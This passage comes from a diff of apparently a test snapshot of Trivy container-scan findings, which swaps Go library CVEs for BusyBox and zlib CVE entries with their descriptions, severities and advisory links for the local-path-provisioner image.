"https://www.cve.org/CVERecord?id=CVE-2021-42383", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42384", + "installedVersion": "1.31.1-r16", + "packageName": "ssl_client", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-42384", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42384", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42384", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42384", + ], + }, + "category": "Vulnerability", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the handle_special function", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the handle_special()", + "references": [ { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "https://avd.aquasec.com/nvd/cve-2021-42384", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "https://access.redhat.com/security/cve/CVE-2021-42384", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42384", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42384", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42384", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20220412211240-33da011f77ad", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-29526", - "installedVersion": "v0.0.0-20200930185726-fdedc70b468f", - "packageName": "golang.org/x/sys", + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42385", + "installedVersion": "1.31.1-r16", + "packageName": "ssl_client", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-29526", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", - "https://github.com/advisories/GHSA-p782-xgp4-8hr8", - "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", - "https://github.com/golang/go/issues/52313", - "https://go.dev/cl/399539", - "https://go.dev/cl/400074", - "https://go.dev/issue/52313", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", - "https://linux.oracle.com/cve/CVE-2022-29526.html", - "https://linux.oracle.com/errata/ELSA-2022-5337.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", - "https://pkg.go.dev/vuln/GO-2022-0493", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220729-0001/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "https://access.redhat.com/security/cve/CVE-2021-42385", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42385", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42385", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42385", ], }, "category": "Vulnerability", - "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate function", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "faccessat checks wrong group", + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29526", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29526", + "value": "https://avd.aquasec.com/nvd/cve-2021-42385", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "value": "https://access.redhat.com/security/cve/CVE-2021-42385", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42385", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/52313", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://go.dev/cl/399539", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://go.dev/cl/400074", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://go.dev/issue/52313", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42385", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42385", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42386", + "installedVersion": "1.31.1-r16", + "packageName": "ssl_client", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-42386", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42386", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42386", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42386", + ], + }, + "category": "Vulnerability", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the nvalloc function", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the nvalloc()", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-42386", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "value": "https://access.redhat.com/security/cve/CVE-2021-42386", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42386", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0493", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42386", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42386", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.3.7", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-38561", - "installedVersion": "v0.3.3", - "packageName": "golang.org/x/text", + "fixedVersion": "1.31.1-r22", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2022-28391", + "installedVersion": "1.31.1-r16", + "packageName": "ssl_client", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-38561", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", - "https://deps.dev/advisory/OSV/GO-2021-0113", - "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", - "https://go.dev/cl/340830", - "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", - "https://groups.google.com/g/golang-announce", - "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", - "https://pkg.go.dev/golang.org/x/text/language", - "https://pkg.go.dev/vuln/GO-2021-0113", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "https://access.redhat.com/security/cve/CVE-2022-28391", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28391", + "https://git.alpinelinux.org/aports/plain/main/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch", + "https://git.alpinelinux.org/aports/plain/main/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch", + "https://gitlab.alpinelinux.org/alpine/aports/-/issues/13661", + "https://nvd.nist.gov/vuln/detail/CVE-2022-28391", + "https://www.cve.org/CVERecord?id=CVE-2022-28391", ], }, "category": "Vulnerability", - "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", + "description": "BusyBox through 1.35.0 allows remote attackers to execute arbitrary code if netstat is used to print a DNS PTR record's value to a VT compatible terminal. Alternatively, the attacker could choose to change the terminal's colors.", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", + "name": "busybox: remote attackers may execute arbitrary code if netstat is used", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-38561", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-38561", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", - }, - { - "type": "URL", - "value": "https://deps.dev/advisory/OSV/GO-2021-0113", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", - }, - { - "type": "URL", - "value": "https://go.dev/cl/340830", + "value": "https://avd.aquasec.com/nvd/cve-2022-28391", }, { "type": "URL", - "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", + "value": "https://access.redhat.com/security/cve/CVE-2022-28391", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28391", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "value": "https://git.alpinelinux.org/aports/plain/main/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch", }, { "type": "URL", - "value": "https://pkg.go.dev/golang.org/x/text/language", + "value": "https://git.alpinelinux.org/aports/plain/main/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0113", + "value": "https://gitlab.alpinelinux.org/alpine/aports/-/issues/13661", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-28391", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-28391", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.3", - "packageName": "golang.org/x/text", + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42374", + "installedVersion": "1.31.1-r16", + "packageName": "ssl_client", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "https://access.redhat.com/security/cve/CVE-2021-42374", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42374", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42374", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42374", ], }, "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "description": "An out-of-bounds heap read in Busybox's unlzma applet leads to information leak and denial of service when crafted LZMA-compressed input is decompressed. This can be triggered by any applet/format that", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "name": "busybox: out-of-bounds read in unlzma applet leads to information leak and denial of service when crafted LZMA-compressed input is decompressed", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", + "value": "https://avd.aquasec.com/nvd/cve-2021-42374", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + "value": "https://access.redhat.com/security/cve/CVE-2021-42374", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42374", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42374", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42374", + }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.2.12-r2", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2022-37434", + "installedVersion": "1.2.11-r3", + "packageName": "zlib", + "references": [ + "http://seclists.org/fulldisclosure/2022/Oct/37", + "http://seclists.org/fulldisclosure/2022/Oct/38", + "http://seclists.org/fulldisclosure/2022/Oct/41", + "http://seclists.org/fulldisclosure/2022/Oct/42", + "http://www.openwall.com/lists/oss-security/2022/08/05/2", + "http://www.openwall.com/lists/oss-security/2022/08/09/1", + "https://access.redhat.com/errata/RHSA-2022:8291", + "https://access.redhat.com/security/cve/CVE-2022-37434", + "https://bugzilla.redhat.com/2116639", + "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", + "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", + "https://errata.almalinux.org/9/ALSA-2022-8291.html", + "https://errata.rockylinux.org/RLSA-2022:8291", + "https://github.com/curl/curl/issues/9271", + "https://github.com/ivd38/zlib_overflow", + "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", + "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", + "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", + "https://linux.oracle.com/cve/CVE-2022-37434.html", + "https://linux.oracle.com/errata/ELSA-2023-1095.html", + "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", + "https://security.netapp.com/advisory/ntap-20220901-0005/", + "https://security.netapp.com/advisory/ntap-20230427-0007/", + "https://support.apple.com/kb/HT213488", + "https://support.apple.com/kb/HT213489", + "https://support.apple.com/kb/HT213490", + "https://support.apple.com/kb/HT213491", + "https://support.apple.com/kb/HT213493", + "https://support.apple.com/kb/HT213494", + "https://ubuntu.com/security/notices/USN-5570-1", + "https://ubuntu.com/security/notices/USN-5570-2", + "https://ubuntu.com/security/notices/USN-5573-1", + "https://www.cve.org/CVERecord?id=CVE-2022-37434", + "https://www.debian.org/security/2022/dsa-5218", + ], + }, + "category": "Vulnerability", + "description": "zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference).", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-37434", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "http://seclists.org/fulldisclosure/2022/Oct/37", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "http://seclists.org/fulldisclosure/2022/Oct/38", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "http://seclists.org/fulldisclosure/2022/Oct/41", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "http://seclists.org/fulldisclosure/2022/Oct/42", + }, + { + "type": "URL", + "value": "http://www.openwall.com/lists/oss-security/2022/08/05/2", + }, + { + "type": "URL", + "value": "http://www.openwall.com/lists/oss-security/2022/08/09/1", + }, + { + "type": "URL", + "value": "https://access.redhat.com/errata/RHSA-2022:8291", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2022-37434", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/2116639", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", + }, + { + "type": "URL", + "value": "https://errata.almalinux.org/9/ALSA-2022-8291.html", + }, + { + "type": "URL", + "value": "https://errata.rockylinux.org/RLSA-2022:8291", + }, + { + "type": "URL", + "value": "https://github.com/curl/curl/issues/9271", + }, + { + "type": "URL", + "value": "https://github.com/ivd38/zlib_overflow", + }, + { + "type": "URL", + "value": "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", + }, + { + "type": "URL", + "value": "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", + }, + { + "type": "URL", + "value": "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2022-37434.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-1095.html", + }, + { + "type": "URL", + "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220901-0005/", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", + }, + { + "type": "URL", + "value": "https://support.apple.com/kb/HT213488", + }, + { + "type": "URL", + "value": "https://support.apple.com/kb/HT213489", + }, + { + "type": "URL", + "value": "https://support.apple.com/kb/HT213490", + }, + { + "type": "URL", + "value": "https://support.apple.com/kb/HT213491", + }, + { + "type": "URL", + "value": "https://support.apple.com/kb/HT213493", + }, + { + "type": "URL", + "value": "https://support.apple.com/kb/HT213494", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5570-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5570-2", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5573-1", + }, + { + 